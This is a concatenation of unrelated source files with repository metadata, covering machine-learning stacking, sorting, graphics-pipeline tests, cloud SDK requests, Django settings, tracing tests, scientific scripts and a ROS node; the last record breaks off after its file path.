if __name__ == '__main__':
warnings.filterwarnings('ignore')
plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号
data = pd.read_csv('train_dataset.csv', encoding='utf-8')
test = pd.read_csv('test_dataset.csv', encoding='utf-8')
data = data
data = data.fillna(0)
data_hot = data.drop(columns=["用户编码", "信用分", "是否大学生客户", "用户实名制是否通过核实", "当月是否到过福州山姆会员店", "用户最近一次缴费距今时长(月)",
"当月是否逛过福州仓山万达", "是否黑名单客户", "当月物流快递类应用使用次数",
"是否经常逛商场的人", "是否4G不健康客户", "当月火车类应用使用次数", "当月是否看电影", "当月是否体育场馆消费"])
data_hot = pd.DataFrame(data_hot, dtype=float)
train_columns = data_hot.columns.values
test_data = test.drop(columns=["用户编码", "是否大学生客户", "用户实名制是否通过核实", "当月是否到过福州山姆会员店", "用户最近一次缴费距今时长(月)",
"当月是否逛过福州仓山万达", "是否黑名单客户", "当月物流快递类应用使用次数",
"是否经常逛商场的人", "是否4G不健康客户", "当月火车类应用使用次数", "当月是否看电影", "当月是否体育场馆消费"])
test_data = pd.DataFrame(test_data, dtype=float)
target_data = data["信用分"]
train_data = preprocessing.scale(data_hot)
test_data = preprocessing.scale(test_data)
ran_params = {'criterion': 'mae', 'max_depth': 3, 'n_estimators': 200, 'verbose': 1}
logistic_params = {'penalty': 'l2', 'solver': 'lbfgs', 'verbose': 1}
'''模型融合中使用到的各个单模型'''
clfs = [LinearRegression(),
ExtraTreesRegressor(**ran_params, bootstrap=True),
RandomForestRegressor(**ran_params),
GradientBoostingRegressor(**ran_params),
LogisticRegression(**logistic_params)]
id = test["用户编码"]
new_feature_value, test_data_set=stacking_model().first_level_model(nfolds=5, train_data=train_data,target_data=target_data,test_data=test_data,clfs=clfs)
new_feature_matrix, new_test_matrix=stacking_model().second_model_train(new_feature_value=new_feature_value,test_data_set=test_data_set)
stacking_model().second_model_predict(new_feature_matrix=new_feature_matrix,new_test_matrix=new_test_matrix,id=id)
|
[
"yanhanwp@foxmail.com"
] |
yanhanwp@foxmail.com
|
c47c906664dbd888a1d723d0837682c338029085
|
f5e2f10e3e9cdd7202d64fd2abb832e9a780ffd5
|
/sorting/quick_sort.py
|
1bbd427f08de015c15fc9f4faab40bdb95233d4b
|
[] |
no_license
|
sarahbkim/cracking_python
|
9b51686c7383375a6c28f52b73d59ae801638965
|
42e059ea19be537cd2af467cdb8e4b777a47aa56
|
refs/heads/master
| 2016-09-05T18:47:43.812688
| 2015-05-08T04:08:46
| 2015-05-08T04:08:46
| 32,619,307
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,711
|
py
|
import unittest
### QUICK SORT
# Divide & Conquer algorithm. Break down the array into sublists until you just get an arr with 1 elem,
# which is always sorted.
## Time: O(n log(n)) average, O(n^2) worst
# worst case scenario avoided with randomized Quick sort
# an efficient sorting algo
# in-place algorithm
## PSEUDOCODE
# partition the list from a pivot (i.e. last element in the list
# then split the list to L and R and partition again
# ## quick sort
def quicksort(arr, start, end):
if start < end:
idx = partition(arr, start, end)
quicksort(arr, start, idx-1)
quicksort(arr, idx+1, end)
return arr
# ## partition
# # select pivot and move elems less than pivot to left, others towards the right
# # returns pivot idx to the quick sort
# # params: arr, start, enddef partition2(arr, start, end):
def partition(arr, start, end):
pivot = arr[end] # choose last element to be the pivot
p_idx = start # have p_idx at start of arr
while start < end:
# if item is less than pivot, then swap the items
if arr[start] <= pivot:
arr[start], arr[p_idx] = arr[p_idx], arr[start]
# increment p index
p_idx += 1
start += 1
# swap the pivot item with current p_idx
arr[p_idx], arr[end] = arr[end], arr[p_idx]
return p_idx
class QuickSortTest(unittest.TestCase):
def test(self):
arr = [5, 10, 3, 4, 1]
self.assertEquals(quicksort(arr, 0, len(arr)-1), [1, 3, 4, 5, 10])
def test2(self):
arr = [6, 10, 3, 4, 1, 10, 3, 4, 1]
self.assertEquals(quicksort(arr, 0, len(arr)-1), [1, 1, 3, 3, 4, 4, 6, 10, 10])
if __name__ == '__main__':
unittest.main()
|
[
"pnkdaegee@gmail.com"
] |
pnkdaegee@gmail.com
|
d500ebaec39d2def778178f1c490ffd4688b3d30
|
afa9fcd0f2443515ba89e96ed4eb9416e9d11847
|
/python/GafferSceneTest/MapProjectionTest.py
|
010691447614b653bf9473ed94e0a97b3838810b
|
[
"BSD-3-Clause"
] |
permissive
|
dneg/gaffer
|
6eb12b3ab3cde00afdf170c456969a38f5968237
|
e87cb50f55a048cd7f6d5dcdfe6f95e38db2c5b6
|
refs/heads/master
| 2021-01-16T18:13:33.456876
| 2013-09-24T17:23:58
| 2013-09-24T17:23:58
| 13,094,917
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
##########################################################################
#
# Copyright (c) 2013, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import IECore
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class MapProjectionTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
camera["transform"]["translate"]["z"].setValue( 2 )
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
map["camera"].setValue( "/group/camera" )
oIn = group["out"].object( "/group/cube" )
self.assertTrue( "s" not in oIn )
self.assertTrue( "t" not in oIn )
oOut = map["out"].object( "/group/cube" )
self.assertTrue( "s" in oOut )
self.assertTrue( "t" in oOut )
self.assertTrue( oOut.arePrimitiveVariablesValid() )
oIn["s"] = oOut["s"]
oIn["t"] = oOut["t"]
self.assertEqual( oIn, oOut )
camera["transform"]["translate"]["z"].setValue( 3 )
oOut2 = map["out"].object( "/group/cube" )
self.assertNotEqual( oOut, oOut2 )
def testAffects( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
cs = GafferTest.CapturingSlot( map.plugDirtiedSignal() )
camera["transform"]["translate"]["z"].setValue( 2 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
del cs[:]
camera["fieldOfView"].setValue( 10 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
del cs[:]
cube["transform"]["translate"]["z"].setValue( 2 )
self.assertTrue( "out.object" in [ x[0].relativeName( x[0].node() ) for x in cs ] )
def testHash( self ) :
cube = GafferScene.Cube()
camera = GafferScene.Camera()
group = GafferScene.Group()
group["in"].setInput( cube["out"] )
group["in1"].setInput( camera["out"] )
map = GafferScene.MapProjection()
map["in"].setInput( group["out"] )
h = map["out"].objectHash( "/group/cube" )
self.assertNotEqual( h, group["out"].objectHash( "/group/cube" ) )
cube["transform"]["translate"]["y"].setValue( 1 )
h2 = map["out"].objectHash( "/group/cube" )
self.assertNotEqual( h, h2 )
if __name__ == "__main__":
unittest.main()
|
[
"john@image-engine.com"
] |
john@image-engine.com
|
a72ef8be86d1904289c47fdf6c7fd22e4c7355ea
|
b7620d0f1a90390224c8ab71774b9c906ab3e8e9
|
/aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20180510/DescribeDomainPvDataRequest.py
|
bd43d6bb5986591e22ae2292f903f6fe900c1dd0
|
[
"Apache-2.0"
] |
permissive
|
YaoYinYing/aliyun-openapi-python-sdk
|
e9c62940baee1a35b9ec4a9fbd1e4eb0aaf93b2f
|
e9a93cc94bd8290d1b1a391a9cb0fad2e6c64627
|
refs/heads/master
| 2022-10-17T16:39:04.515562
| 2022-10-10T15:18:34
| 2022-10-10T15:18:34
| 117,057,304
| 0
| 0
| null | 2018-01-11T06:03:02
| 2018-01-11T06:03:01
| null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class DescribeDomainPvDataRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2018-05-10', 'DescribeDomainPvData')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StartTime(self): # String
return self.get_query_params().get('StartTime')
def set_StartTime(self, StartTime): # String
self.add_query_param('StartTime', StartTime)
def get_DomainName(self): # String
return self.get_query_params().get('DomainName')
def set_DomainName(self, DomainName): # String
self.add_query_param('DomainName', DomainName)
def get_EndTime(self): # String
return self.get_query_params().get('EndTime')
def set_EndTime(self, EndTime): # String
self.add_query_param('EndTime', EndTime)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
c5b0ca7e31d2cb586122c3ad34788c01d36e6a10
|
8cec8e60bd3823626a6b7e749da4c49cb633eb68
|
/Analyzer/models.py
|
ab71cf62a7ab4f4afb2cffedf1bb3b60eeabdecd
|
[] |
no_license
|
FaizanAkhtar0/Web-App-Senitment-Summarization-Analyzer
|
6cb039849cedaf32c33414a6d67d10261880c4de
|
a1e6d4dc43f2cbc469477831ee89542c75db4e21
|
refs/heads/master
| 2023-06-07T11:26:50.309662
| 2021-07-06T10:25:32
| 2021-07-06T10:25:32
| 383,429,279
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
from django.db import models
# Create your models_lib here.
class SentimentModel(models.Model):
text = models.TextField()
def __str__(self):
return self.text
class SummarizationModel(models.Model):
text = models.TextField()
def __str__(self):
return self.text
|
[
"alex.davidson0987123@gmail.com"
] |
alex.davidson0987123@gmail.com
|
a16594e568cf009eb007c8eb4537713534cfc437
|
cd555116aaa959def0ce4fd286af6a1819f610f6
|
/tests/security/test_sanity.py
|
4e2db286cdb529cba889df1bc1da1ec284b1a0ee
|
[
"MIT",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause-Clear"
] |
permissive
|
mmichal10/standalone-linux-io-tracer
|
741f3ac23ce6ab43b4f37c75dd3ab06e3793f10b
|
5c15b8d3e43845a96fcf8f325c52cb41acb36739
|
refs/heads/master
| 2021-01-07T23:22:25.350400
| 2020-02-19T13:06:09
| 2020-02-19T13:06:09
| 241,849,378
| 0
| 0
|
BSD-3-Clause-Clear
| 2020-02-20T09:56:54
| 2020-02-20T09:56:53
| null |
UTF-8
|
Python
| false
| false
| 2,161
|
py
|
#
# Copyright(c) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
TestRun.LOGGER.info("Testing cli help")
output = TestRun.executor.run('iotrace -H')
if output.exit_code != 0:
raise Exception("Failed to run executable")
def test_version():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing cli version")
output = TestRun.executor.run('iotrace -V')
parsed = TestRun.plugins['iotrace'].parse_json(output.stdout)
bin_version = parsed[0]['trace']
TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
output = TestRun.executor.run("cat /sys/module/iotrace/version")
if output.exit_code != 0:
raise Exception("Could not find module version")
module_version = output.stdout
TestRun.LOGGER.info("Module version is: " + module_version)
if bin_version != module_version:
raise Exception("Mismatching executable and module versions")
def test_module_loaded():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing iotrace kernel module loading")
output = TestRun.executor.run('lsmod | grep iotrace')
if output.exit_code != 0:
raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
TestRun.LOGGER.info("Testing starting and stopping of tracing")
iotrace: IotracePlugin = TestRun.plugins['iotrace']
iotrace.start_tracing()
stopped = iotrace.stop_tracing()
if not stopped:
raise Exception("Could not stop active tracing.")
trace_path = iotrace.get_latest_trace_path()
summary = iotrace.get_trace_summary(trace_path)
summary_parsed = iotrace.parse_json(summary)
if summary_parsed[0]['state'] != "COMPLETE":
raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest.
|
[
"mariusz.barczak@intel.com"
] |
mariusz.barczak@intel.com
|
1472ac32737236cd11833e6481a3ca467567341f
|
dce9fd80ad1e35e3fc9fd20d54da03d6a91be11e
|
/main.py
|
58d79589270934c156b296673f48b3573a7611ec
|
[] |
no_license
|
perxpective/Number-Systems-Converter
|
ef4f00f8e22436f9963038ca57cfca81399c6567
|
00d72be3468a2621ba8861e9c0da5529842914c2
|
refs/heads/master
| 2022-11-14T01:05:09.475320
| 2020-07-12T09:05:11
| 2020-07-12T09:05:11
| 264,118,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
import binascii
output = ''
print('[1] convert to binary')
print('[2] covnert to hexadecimals')
print('[3] convert to octodecimals')
print('[4] decode to hexadecimal to text')
option = input('select option: ')
while not (option == '1' or option == '2' or option == '3' or option == '4'):
print('invalid input')
option = input('select option: ')
# text to ascii to binary
if option == '1':
string = input('enter string to cipher: ')
for char in string:
char_num = bin(ord(char))
output += char_num[2:]
# text to ascii to hexadecimals
elif option == '2':
string = input('enter string to cipher: ')
for char in string:
char_num = hex(ord(char))
output += char_num[2:]
# text to ascii to octodecimals
elif option == '3':
string = input('enter string to cipher: ')
for char in range(len(string)):
char_num = oct(ord(string[char]))
output += char_num[2:]
# deciphering
elif option == '4':
string = input('enter string to decipher: ')
output = binascii.unhexlify(string).decode()
print('value: ', output)
|
[
"noreply@github.com"
] |
perxpective.noreply@github.com
|
6c3bba898e8333956b874fecb0fdc452a4f7fd87
|
c7d86fee5322ca7f2c57fff79798c82385d86769
|
/jisc_django_test/settings.py
|
375aea2b7fa17d555874cf3e286ff929475d4fc8
|
[] |
no_license
|
scheung38/jisc_django_test
|
493d146b80defc9c3eea88e607cb783da3433940
|
408793ae1495ce4e6a4b57c91d32605039f68419
|
refs/heads/master
| 2021-04-12T11:01:41.770406
| 2017-06-16T17:35:10
| 2017-06-16T17:35:10
| 94,537,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,499
|
py
|
"""
Django settings for jisc_django_test project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o)wl=4potk%kqb2m^m&pl6nk8mi13)r%24b+&mctamdkkdbo*)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [u'localhost', u'6564f81c.ngrok.io']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'hitcount',
]
EMAIL_HOST = os.environ['EMAIL_HOST']
EMAIL_PORT = os.environ['EMAIL_PORT']
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USER']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jisc_django_test.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'jisc_django_test.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"sebastian_cheung@yahoo.com"
] |
sebastian_cheung@yahoo.com
|
21fb22dd59287a6c7319cdac2b7cc612d60154c8
|
c6f493d0955803d58dc41f0a4b12847f1ce83712
|
/py_journal_fielded_retrieval/trecEvalTuneBoost_Navigational.py
|
24fd301d6bbcf3eaa4e901d66471f4ef0d3b7c02
|
[] |
no_license
|
ielab/field-based-retrieval
|
7b94c0feb5cd0de25087cb7bb94c055b286257db
|
dd54785473af6fc70fd2242c4fc64323bcb1e8c2
|
refs/heads/master
| 2020-11-28T02:24:09.515215
| 2019-12-23T05:00:53
| 2019-12-23T05:00:53
| 229,679,505
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
# This script do trec eval with minimum threshold of 4 to measure Reciprocal Rank for WEB 2013-2014
import commands, os
import glob
import multiprocessing
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d",
"--dataset",
help="WEB2013-2014",
choices=["WEB2013-2014"])
args = parser.parse_args()
dataSet = args.dataset
if dataSet == "WEB2013-2014":
qrelPath = "/volumes/ext/data/webTrack2013-2014_eval/qrels.adhoc2013-2014.txt"
topPrefix = "topTuneBoost_Web_alpha"
resultFile = "evalTuneBoost_Web_Navigational.txt"
trecPath = "/volumes/ext/tools/trec_eval.9.0/"
dataPath = '/volumes/ext/jimmy/experiments/ipm_fielded_retrieval/data/'
def eval(fname):
trecResults = commands.getoutput(trecPath +
'trec_eval -q -l 4 -m map -m P.10 -m ndcg_cut.10,1000 -m bpref -m relstring.10 '
'-m recip_rank ' + qrelPath + " " + fname)
#print trecResults
filename = os.path.basename(fname)
alpha = filename.replace(topPrefix,"")
map = p10 = ndcg10 = ndcg1000 = bpref = numUnjudged = rr = "*"
relString = qNum = "*"
resultString = ""
for res in trecResults.splitlines():
measure = res.split()[0]
qNum = res.split()[1]
score = res.split()[2]
if qNum != "all":
if measure == "map":
map = score
elif measure == "bpref":
bpref = score
elif measure == "P_10":
p10 = score
elif measure == "relstring_10":
relString = score
numUnjudged = relString.count('-')
elif measure == "recip_rank":
rr = score
elif measure == "ndcg_cut_10":
ndcg10 = score
elif measure == "ndcg_cut_1000":
ndcg1000 = score
resultString += filename + " " + alpha + " " + qNum + " " + map + " " + p10 + " " + ndcg10 + " " + \
ndcg1000 + " " + bpref + " " + str(numUnjudged) + " " + relString + " " + rr + "\n"
print ("File name: {0} Completed".format(filename))
return resultString
fileNames = glob.glob(dataPath + topPrefix + "*")
fw = open(dataPath + resultFile, 'w')
fw.write("schema" + " " + "alpha" + " " + " QueryNum"+ " " + "map" + " " + "p10" + " " + "ndcg10" + " " + "ndcg1000" +
" " + "bpref" + " " + "unjudged" + " " + "relString" + " " + "rr""\n")
p = multiprocessing.Pool()
resultString = p.map(eval, fileNames)
for res in resultString:
fw.write(res)
p.close()
p.join()
fw.close()
|
[
"g.zuccon@uq.edu.au"
] |
g.zuccon@uq.edu.au
|
d26bcb089045d4c612eaf552518266598fa78686
|
a929c07c2252028fc054bd8de957286a76b89e03
|
/src/android/src/vo_restarter.py
|
b3290f37c7c857fca0ffb1718442dea36d61c6c5
|
[
"BSD-3-Clause"
] |
permissive
|
Mars-Rover-Manipal/catkin_ws
|
77e313c20162833331e23c82c93a15a002a204ff
|
9858d19ee1457e94952717798c5b927e0b0570cf
|
refs/heads/master
| 2022-04-16T06:56:02.781109
| 2020-03-05T09:08:32
| 2020-03-05T09:08:32
| 263,706,258
| 1
| 0
|
BSD-3-Clause
| 2020-05-13T18:02:58
| 2020-05-13T18:02:57
| null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import Imu
from nav_msgs.msg import Odometry
from rtabmap_ros.srv import *
import tf
rospy.init_node('vo_restarter.py', anonymous=True)
last_odom = Odometry()
last_imu = Imu()
def reset_odom_to(p, o):
rospy.logdebug('Restarting Odometry')
rospy.wait_for_service('reset_odom_to_pose')
try:
reset = rospy.ServiceProxy('reset_odom_to_pose', ResetPose)
eu = tf.transformations.euler_from_quaternion((p.orientation.x, p.orientation.y, p.orientation.z, p.orientation.w))
reset(o.pose.pose.x, o.pose.pose.y, o.pose.pose.z, eu[0], eu[1], eu[2])
rospy.logdebug('Service reset successfull')
except rospy.ServiceException, e:
rospy.logfatal('Service call to restore vo failed')
def store_last_odom(data):
global last_imu, last_odom
if data.pose.covariance[0] == 9999.0:
reset_odom_to(last_imu, last_odom)
else:
last_odom = data
def store_last_orientation(data):
global last_imu
last_imu = data
def main():
rospy.Subscriber('/visual_odom', Odometry, store_last_odom)
rospy.Subscriber('/phone/imu/data', Imu, store_last_orientation)
rospy.spin()
if __name__ == '__main__':
main()
|
[
"abhirajtiwari@gmail.com"
] |
abhirajtiwari@gmail.com
|
5ffbe59f9c81e547faa22ba27b316ef2516f1251
|
439671db0b34da214f225f78ca331cabd24cad79
|
/SubmissionScripts/catCRISPRKOFastq_2.py
|
9b705756f29ffef335338b1e83bf5a2c99c4bd8a
|
[] |
no_license
|
arjunrajlaboratory/TEanalysis
|
18c42726b75c5f8a273e606b5383eaf40485e46e
|
1ba383bb481841baa009fcb15ed39c26c1f062f3
|
refs/heads/master
| 2022-09-01T07:13:30.845976
| 2020-05-26T20:52:53
| 2020-05-26T20:52:53
| 267,149,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,886
|
py
|
#Concatanate fastq files for each sample across multiple lanes.
#Written for et_CRISPR-RNAseq KO data on PMACS
import os, shutil
from argparse import ArgumentParser
import glob
import regex as re
#Command line parser
parser = ArgumentParser()
parser.add_argument("-i", "--inDirs", help = "Specify the input directories.", nargs = '+')
parser.add_argument("-o", "--outDir", help = "Specify the output directory")
args = parser.parse_args()
inputDirectories = args.inDirs
if not os.path.exists(args.outDir):
os.makedirs(args.outDir)
sampleNameRegex = re.compile('.+?(?=_S)')
for i, run in enumerate(inputDirectories):
samplePaths = glob.glob(os.path.join(run, 'melanoma-*'))
for j in samplePaths:
fastqFiles_R1 = sorted(glob.glob(os.path.join(j, '*_R1_*.fastq.gz')))
fastqFiles_R2 = sorted(glob.glob(os.path.join(j, '*_R2_*.fastq.gz')))
sampleName = sampleNameRegex.search(os.path.basename(fastqFiles_R1[0])).group()
sampleOutDir = os.path.join(args.outDir, sampleName)
if not os.path.exists(sampleOutDir):
os.makedirs(sampleOutDir)
sampleOutFile_R1 = os.path.join(sampleOutDir, sampleName + '_R1.fastq.gz')
sampleOutFile_R2 = os.path.join(sampleOutDir, sampleName + '_R2.fastq.gz')
if i == 0:
print sampleOutFile_R1
with open(sampleOutFile_R1, 'w') as out_R1:
for k1 in fastqFiles_R1:
print k1
shutil.copyfileobj(open(k1, 'r'), out_R1)
print sampleOutFile_R2
with open(sampleOutFile_R2, 'w') as out_R2:
for k2 in fastqFiles_R2:
print k2
shutil.copyfileobj(open(k2, 'r'), out_R2)
elif i > 0:
print sampleOutFile_R1
with open(sampleOutFile_R1, 'a') as out_R1:
for k1 in fastqFiles_R1:
print k1
shutil.copyfileobj(open(k1, 'r'), out_R1)
print sampleOutFile_R2
with open(sampleOutFile_R2, 'a') as out_R2:
for k2 in fastqFiles_R2:
print k2
shutil.copyfileobj(open(k2, 'r'), out_R2)
|
[
"benjamin.emert@gmail.com"
] |
benjamin.emert@gmail.com
|
73906b24af6a13dc6c87fc68d7894a007084672d
|
5cad50399a3bd3634029f03684a3f44e94543aaf
|
/baekjoon/1781.py
|
7ef741edefb69b2b054a0666631cad84077af1bb
|
[] |
no_license
|
didrlgus/algorithm-python
|
021676a09204e9bff70ab4a21ddfa020e809028b
|
f39707d308ad4b055f515f995fa904ec71185193
|
refs/heads/master
| 2023-06-27T15:03:54.840375
| 2021-07-31T06:52:37
| 2021-07-31T06:52:37
| 359,126,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
# 컵라면
import heapq
n = int(input())
arr = []
q = []
for _ in range(n):
a, b = map(int, input().split())
arr.append((a,b))
arr.sort()
for el in arr:
dead_line = el[0]
heapq.heappush(q, el[1])
if len(q) > dead_line:
heapq.heappop(q)
print(sum(q))
|
[
"rlgusdid@naver.com"
] |
rlgusdid@naver.com
|
1d3c99b61385bfd04ca91eb103455f99a6d2cc49
|
b59c3e55d51278640987b1f43073333a082d8ebf
|
/src/SimplePlotreplication.py
|
38144d26d21ba9092a13311ad336460ffe0a5348
|
[] |
no_license
|
rluteijn/SmartGridDiffusion
|
acab499db0d3fdfce8722be1086ca4f75c409bf5
|
1b780c77cb36d5d43942a10bd44891b5fca31f28
|
refs/heads/master
| 2020-12-26T03:12:22.876657
| 2014-07-25T14:15:40
| 2014-07-25T14:15:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
'''
Created on 6 mrt. 2013
@author: Andris
'''
'''===========================Plotting lines, KDE, envelopes===================================='''
#from analysis import graphs
import numpy as np
import matplotlib.pyplot as plt
from expWorkbench import ema_logging, load_results
from analysis.plotting import lines, KDE, envelopes
ema_logging.log_to_stderr(level=ema_logging.DEFAULT_LEVEL)
#load the data
experiments, outcomes = load_results(r'Data/200 runs.bz2')
results = (experiments, outcomes)
'''==============================================================================
print out the lines, envelope and KDE
=============================================================================='''
desired__nr_lines = 200
nr_cases = experiments.shape[0]
indices = np.arange(0, nr_cases, nr_cases/desired__nr_lines)
#for key in ['repayment months']:
for key, value in outcomes.items():
ooi_name = key
ooi = outcomes[ooi_name]
ooi = np.reshape(ooi, (ooi.shape[0]*ooi.shape[1], ooi.shape[2]))
temp_outcomes = {ooi_name: ooi}
lines((ooi, temp_outcomes), density=KDE,
show_envelope=True, experiments_to_show=indices,
titles="")
plt.show()
# n = key
# plt.savefig("./pictures/KDE_30_{}.png".format(n), dpi=75)
'''==============================================================================
to print for only selected outomes and group by model:
=============================================================================='''
#for key in ['total revenue Yearly']:
# fig, axes = envelopes(results, outcomes_to_show=key, density=KDE,
# group_by='model', titles="",fill=True)
|
[
"titan946@gmail.com"
] |
titan946@gmail.com
|
efbd0a5281d884e72317ff76eef6217a7b1c635a
|
611b36b4f65de03874daa7c13a0c8260d4c76264
|
/backend/src/auth/auth.py
